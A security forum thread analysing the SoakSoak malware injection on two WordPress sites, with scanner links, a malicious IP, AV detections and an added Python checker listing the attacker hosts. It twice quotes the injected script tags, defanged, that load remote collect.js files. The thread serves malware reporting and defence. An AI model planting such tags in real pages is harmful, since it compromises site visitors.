SEO SPAM malcode on website...

See: http://killmalware.com/parix.de/
100/100% malicious: http://zulu.zscaler.com/submission/show/aa04ca39627a89ca655ed8f76212a8a0-1419189704
Offending IP from script on site: http://www.liveipmap.com/122.155.168.105
See: http://www.abuseipdb.com/check/122.155.168.105
The problem → https://wordpress.org/support/topic/mwspamseo-spam-problem
VT does not flag site as such. Detected: http://sitecheck.sucuri.net/results/www.parix.de
Outdated Web Server Apache Found: Apache/2.2.22
2 malicious files: http://quttera.com/detailed_report/www.parix.de

[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]

pol

https://www.virustotal.com/nb/file/707821fa3e3b5775a1bd462df6ec52aecc5b23a83a4903cc0137833aa89bb96a/analysis/1419191101/

Hi Pondus,

Funny that VT does not alert anything on that massive SoakSoak attack via the contributing engines, while Sucuri flags it,
but most users (those with Google Chrome and Firefox) were protected by Google Safe Browsing: goog-malware-shavar blacklist alert.

More on this malware campaign: http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
and for cleansing the website - https://wordpress.org/plugins/gotmls/ made by Eli.
Revslider was vulnerable as an automatic update was missed.

polonus

Another victim, see: http://killmalware.com/hakukettu.net/
Here VT detects: https://www.virustotal.com/nb/url/ec56b3155ff8ba6a14fb14c00cb5446529758ea720a9723ca115814d658cecf3/analysis/1419200305/
38 files detected: (a.o. wp-content/uploads/2013/04/karimalogo.jpg )
and the now known malware

[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]

→ WordPress internal path: /home4/macaman/public_html/hakukettu.net/wp-content/themes/kickstart/index.php
WordPress Version 3.8 for: htxp://hakukettu.net/wp-includes/js/wp-ajax-response.js
iFrame injected malware: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?v26

polonus
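
Added example, not part of the original posts: a small check for the injected tags quoted above, which lists `<script>` sources on a page that point off-site to one of the two hosts named in this thread or to any bare IP address. The function names and the "bare IP" heuristic are assumptions of this sketch, and the sample page is constructed.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts taken from the injected tags quoted in this thread.
KNOWN_BAD_HOSTS = {"122.155.168.105", "www.clickevents.com.my"}

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def refang(url):
    """Map defanged schemes (htxp, hxxp) back to http so urlsplit can parse them."""
    return re.sub(r"^h[tx]xp(s?)://", r"http\1://", url.strip(), flags=re.I)

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def suspicious_scripts(html, site_host):
    """Return (src, reason) pairs for off-site scripts that need a manual look."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        host = (urlsplit(refang(src)).hostname or "").lower()
        if not host or host == site_host.lower():
            continue  # relative or same-site script
        if host in KNOWN_BAD_HOSTS:
            findings.append((src, "known indicator from this thread"))
        elif is_ip_literal(host):
            findings.append((src, "script served from a bare IP address"))
    return findings

if __name__ == "__main__":
    # Constructed sample page using the tag quoted in the thread.
    page = '<script src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script>'
    print(suspicious_scripts(page, "example.org"))
```
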

Here we get a right IDS alert: http://urlquery.net/report.php?id=1418927815329 for
"ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers"
The detection is mainly from Google Safe Browsing: http://t.websitecheck.us/www/hakukettu.net

pol

your first post…
https://www.virustotal.com/en/file/707821fa3e3b5775a1bd462df6ec52aecc5b23a83a4903cc0137833aa89bb96a/analysis/1419264760/

Norman/BlueCoat
Detection has been added on the malicious iframe code in the html file parix.de.htm: Iframe.ABV

https://www.virustotal.com/en/file/01d868707822f4517d4fbd96e3ece199ea99dab36cd2ffc426859127f1e14b33/analysis/1419264234/

Norman/BlueCoat
Detection has been added for the malicious html page hakukettu.net.htm: Agent.BLXFW